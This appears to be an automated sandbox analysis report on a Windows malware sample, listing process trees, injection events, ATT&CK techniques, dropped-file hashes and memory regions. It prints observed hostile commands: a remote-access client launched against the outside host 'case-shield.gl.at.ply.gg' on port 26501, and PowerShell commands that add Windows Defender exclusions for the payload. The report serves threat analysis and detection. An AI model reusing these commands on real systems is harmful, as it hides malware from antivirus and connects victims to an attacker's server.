3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe
3596	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
196	SearchUI.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 224 wrote to memory of 4164	224	switched_1.exe	74
PID 224 wrote to memory of 4164	224	switched_1.exe	74
PID 224 wrote to memory of 424	224	switched_1.exe	75
PID 224 wrote to memory of 424	224	switched_1.exe	75
PID 224 wrote to memory of 424	224	switched_1.exe	75
PID 4164 wrote to memory of 3520	4164	pulse x loader.exe	76
PID 4164 wrote to memory of 3520	4164	pulse x loader.exe	76
PID 3520 wrote to memory of 2888	3520	cmd.exe	79
PID 3520 wrote to memory of 2888	3520	cmd.exe	79
PID 3520 wrote to memory of 3372	3520	cmd.exe	80
PID 3520 wrote to memory of 3372	3520	cmd.exe	80
PID 3520 wrote to memory of 3060	3520	cmd.exe	81
PID 3520 wrote to memory of 3060	3520	cmd.exe	81
PID 424 wrote to memory of 3952	424	tesetey.exe	82
PID 424 wrote to memory of 3952	424	tesetey.exe	82
PID 424 wrote to memory of 3952	424	tesetey.exe	82
PID 3952 wrote to memory of 3464	3952	csc.exe	83
PID 3952 wrote to memory of 3464	3952	csc.exe	83
PID 3952 wrote to memory of 3464	3952	csc.exe	83
PID 424 wrote to memory of 3596	424	tesetey.exe	84
PID 424 wrote to memory of 3596	424	tesetey.exe	84
PID 424 wrote to memory of 3936	424	tesetey.exe	85
PID 424 wrote to memory of 3936	424	tesetey.exe	85
PID 424 wrote to memory of 3936	424	tesetey.exe	85
PID 424 wrote to memory of 3936	424	tesetey.exe	85
PID 424 wrote to memory of 3936	424	tesetey.exe	85
PID 424 wrote to memory of 3936	424	tesetey.exe	85
PID 424 wrote to memory of 3936	424	tesetey.exe	85
PID 424 wrote to memory of 3936	424	tesetey.exe	85
PID 424 wrote to memory of 1364	424	tesetey.exe	86
PID 424 wrote to memory of 1364	424	tesetey.exe	86
PID 424 wrote to memory of 1364	424	tesetey.exe	86
PID 3596 wrote to memory of 3732	3596	explorer.exe	88
PID 3596 wrote to memory of 3732	3596	explorer.exe	88
PID 3596 wrote to memory of 3020	3596	explorer.exe	89
PID 3596 wrote to memory of 3020	3596	explorer.exe	89
PID 1364 wrote to memory of 516	1364	cmd.exe	90
PID 1364 wrote to memory of 516	1364	cmd.exe	90
PID 3936 wrote to memory of 4944	3936	cvtres.exe	91
PID 3936 wrote to memory of 4944	3936	cvtres.exe	91
PID 3936 wrote to memory of 4944	3936	cvtres.exe	91
PID 3936 wrote to memory of 1096	3936	cvtres.exe	93
PID 3936 wrote to memory of 1096	3936	cvtres.exe	93
PID 3936 wrote to memory of 1096	3936	cvtres.exe	93
PID 1096 wrote to memory of 2144	1096	cmd.exe	95
PID 1096 wrote to memory of 2144	1096	cmd.exe	95
PID 1096 wrote to memory of 2144	1096	cmd.exe	95
PID 4944 wrote to memory of 4616	4944	cmd.exe	96
PID 4944 wrote to memory of 4616	4944	cmd.exe	96
PID 4944 wrote to memory of 4616	4944	cmd.exe	96

C:\Users\Admin\AppData\Local\Temp\switched_1.exe
"C:\Users\Admin\AppData\Local\Temp\switched_1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:224
- C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
  "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3520
  - - C:\Windows\system32\certutil.exe
      certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
      4⤵
      PID:2888
  - - C:\Windows\system32\find.exe
      find /i /v "md5"
      4⤵
      PID:3372
  - - C:\Windows\system32\find.exe
      find /i /v "certutil"
      4⤵
      PID:3060
- C:\Users\Admin\AppData\Local\Temp\tesetey.exe
  "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:424
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\02gh4r1y\02gh4r1y.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6978.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCED9F975794054F67817D38BFF937E94E.TMP"
      4⤵
      PID:3464
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    - Modifies Installed Components in the registry
    - Enumerates connected drives
    - Drops file in Windows directory
    - Checks SCSI registry key(s)
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3596
  - - C:\Windows\system32\ctfmon.exe
      ctfmon.exe
      4⤵
      PID:3732
  - - C:\Windows\system32\ctfmon.exe
      ctfmon.exe
      4⤵
      PID:3020
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3936
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4616
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1096
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\Start.exe
      C:\Users\Admin\AppData\Local\Temp\Start.exe
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:516

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:196

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
06e2683e70d0bda52910308dd3ef54fe

SHA1
d18faecc542714474f19e3941b2fcf9c26279ac4

SHA256
5600cf9ab34edc7b93463b5769715490dfbeb7311aaf53eb9facd091e7832e6d

SHA512
6df96d8cb261ef50721b6f6bb7af81b695f91b78b1c4b3f42276f55c8311a4e17d0c054d9daf83b89459f041402c72758d4afa7192aa83ad8be0ffc8936c181e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6978.tmp

Filesize
1KB

MD5
046bf62f4faa53969c8751a84d99bd80

SHA1
cdcd8c3fe86f511eba8cdc6d8827a278970eaa7a

SHA256
64f3d25de5034843fca68ef9aa7a26a544b120b1217a413924b91210406bcca7

SHA512
6f4ee43b45a9d3d9815dfaf81ac064419cee2250297707eb1e19eebacc376215af8b7d747b3428a29ed6c30d0cdbc13015e4016e016d8395dd88e4d733f9a847

Download Submit
C:\Users\Admin\AppData\Local\Temp\Start.exe

Filesize
4KB

MD5
c2f4dc193282377b82343a3cf08db1b0

SHA1
75edccf21ef118b383b6cd5b297643c50d4d718d

SHA256
dc18436941e3fb8f61f5dc47d22c63a6b87041a8010addc9ecac87149651da87

SHA512
46cf4dd8d9a1d8fc608e39e877ecf3e03cbdf7f6db5120fb642e413072ff5876edc5ba775114fb56ab0dc3c907ca7649b0e359439614ebc96788d3fcfa2c8542

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_msmytgty.v0o.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
3.2MB

MD5
ceb8c3c0f2249f05f3df8f88d46ae743

SHA1
651675ba157c085ce64aa5bb2abbfd6f5efc75c6

SHA256
a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778

SHA512
872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\02gh4r1y\02gh4r1y.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\02gh4r1y\02gh4r1y.cmdline

Filesize
447B

MD5
b501ab381121eb9b1c0b04b1199017e8

SHA1
150326c0b5ee545206e89175b5321104973d8a9e

SHA256
ba3e237404f8129482f9b67c095b5bb3324456a7e29305240f80e215faf5faf5

SHA512
0d9c2209ef0a00f59df94ec9117cae6e90899f8e4d6cb9ebf572e35ff327f7053c9bf83a016fa87a64b76fa5fcd4e8ebdda5ff248685b6b03bc1fcf4841442ea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCED9F975794054F67817D38BFF937E94E.TMP

Filesize
1KB

MD5
810535a8ae563d6aa53635a1bb1206ff

SHA1
f5ba39f1a455eb61efe5022b524892249ee75dce

SHA256
7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f

SHA512
5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d

Download Submit
memory/196-582-0x0000027497880000-0x00000274978A0000-memory.dmp

Filesize
128KB

Download
memory/196-586-0x0000027497A00000-0x0000027497A20000-memory.dmp

Filesize
128KB

Download
memory/424-14-0x0000000004C40000-0x0000000004CD2000-memory.dmp

Filesize
584KB

Download
memory/424-16-0x00000000065E0000-0x0000000006ADE000-memory.dmp

Filesize
5.0MB

Download
memory/424-15-0x0000000004B90000-0x0000000004BA0000-memory.dmp

Filesize
64KB

Download
memory/424-51-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/424-13-0x0000000004BA0000-0x0000000004C3C000-memory.dmp

Filesize
624KB

Download
memory/424-11-0x0000000000310000-0x0000000000392000-memory.dmp

Filesize
520KB

Download
memory/424-12-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/516-41-0x0000000000B70000-0x0000000000B78000-memory.dmp

Filesize
32KB

Download
memory/516-42-0x00007FFD97C80000-0x00007FFD9866C000-memory.dmp

Filesize
9.9MB

Download
memory/516-111-0x00007FFD97C80000-0x00007FFD9866C000-memory.dmp

Filesize
9.9MB

Download
memory/516-630-0x000000001BA60000-0x000000001BA70000-memory.dmp

Filesize
64KB

Download
memory/516-58-0x000000001BA60000-0x000000001BA70000-memory.dmp

Filesize
64KB

Download
memory/2144-63-0x00000000081C0000-0x0000000008226000-memory.dmp

Filesize
408KB

Download
memory/2144-291-0x0000000007340000-0x0000000007350000-memory.dmp

Filesize
64KB

Download
memory/2144-45-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/2144-557-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/2144-500-0x0000000009C30000-0x0000000009C38000-memory.dmp

Filesize
32KB

Download
memory/2144-50-0x0000000007980000-0x0000000007FA8000-memory.dmp

Filesize
6.2MB

Download
memory/2144-59-0x0000000007790000-0x00000000077B2000-memory.dmp

Filesize
136KB

Download
memory/2144-62-0x0000000008050000-0x00000000080B6000-memory.dmp

Filesize
408KB

Download
memory/2144-49-0x0000000007340000-0x0000000007350000-memory.dmp

Filesize
64KB

Download
memory/2144-64-0x0000000008230000-0x0000000008580000-memory.dmp

Filesize
3.3MB

Download
memory/2144-65-0x0000000007FE0000-0x0000000007FFC000-memory.dmp

Filesize
112KB

Download
memory/2144-66-0x0000000008B80000-0x0000000008BCB000-memory.dmp

Filesize
300KB

Download
memory/2144-67-0x0000000008900000-0x0000000008976000-memory.dmp

Filesize
472KB

Download
memory/2144-47-0x0000000007340000-0x0000000007350000-memory.dmp

Filesize
64KB

Download
memory/2144-98-0x000000006EE60000-0x000000006EEAB000-memory.dmp

Filesize
300KB

Download
memory/2144-96-0x00000000097E0000-0x0000000009813000-memory.dmp

Filesize
204KB

Download
memory/2144-99-0x00000000097C0000-0x00000000097DE000-memory.dmp

Filesize
120KB

Download
memory/2144-97-0x000000007F440000-0x000000007F450000-memory.dmp

Filesize
64KB

Download
memory/2144-108-0x0000000009920000-0x00000000099C5000-memory.dmp

Filesize
660KB

Download
memory/2144-490-0x0000000009C40000-0x0000000009C5A000-memory.dmp

Filesize
104KB

Download
memory/2144-46-0x0000000007170000-0x00000000071A6000-memory.dmp

Filesize
216KB

Download
memory/2144-120-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/2144-118-0x0000000009D30000-0x0000000009DC4000-memory.dmp

Filesize
592KB

Download
memory/2144-119-0x0000000007340000-0x0000000007350000-memory.dmp

Filesize
64KB

Download
memory/3596-576-0x0000000001380000-0x0000000001381000-memory.dmp

Filesize
4KB

Download
memory/3936-33-0x0000000007110000-0x0000000007120000-memory.dmp

Filesize
64KB

Download
memory/3936-116-0x0000000007110000-0x0000000007120000-memory.dmp

Filesize
64KB

Download
memory/3936-29-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3936-32-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/3936-109-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/4164-55-0x00007FF779640000-0x00007FF779A7C000-memory.dmp

Filesize
4.2MB

Download
memory/4164-9-0x00007FF779640000-0x00007FF779A7C000-memory.dmp

Filesize
4.2MB

Download
memory/4164-636-0x00007FF779640000-0x00007FF779A7C000-memory.dmp

Filesize
4.2MB

Download
memory/4616-57-0x0000000000EA0000-0x0000000000EB0000-memory.dmp

Filesize
64KB

Download
memory/4616-113-0x000000007E7D0000-0x000000007E7E0000-memory.dmp

Filesize
64KB

Download
memory/4616-574-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/4616-56-0x0000000000EA0000-0x0000000000EB0000-memory.dmp

Filesize
64KB

Download
memory/4616-54-0x00000000734E0000-0x0000000073BCE000-memory.dmp

Filesize
6.9MB

Download
memory/4616-121-0x0000000000EA0000-0x0000000000EB0000-memory.dmp

Filesize
64KB

Download
memory/4616-110-0x000000006EE60000-0x000000006EEAB000-memory.dmp

Filesize
300KB

Download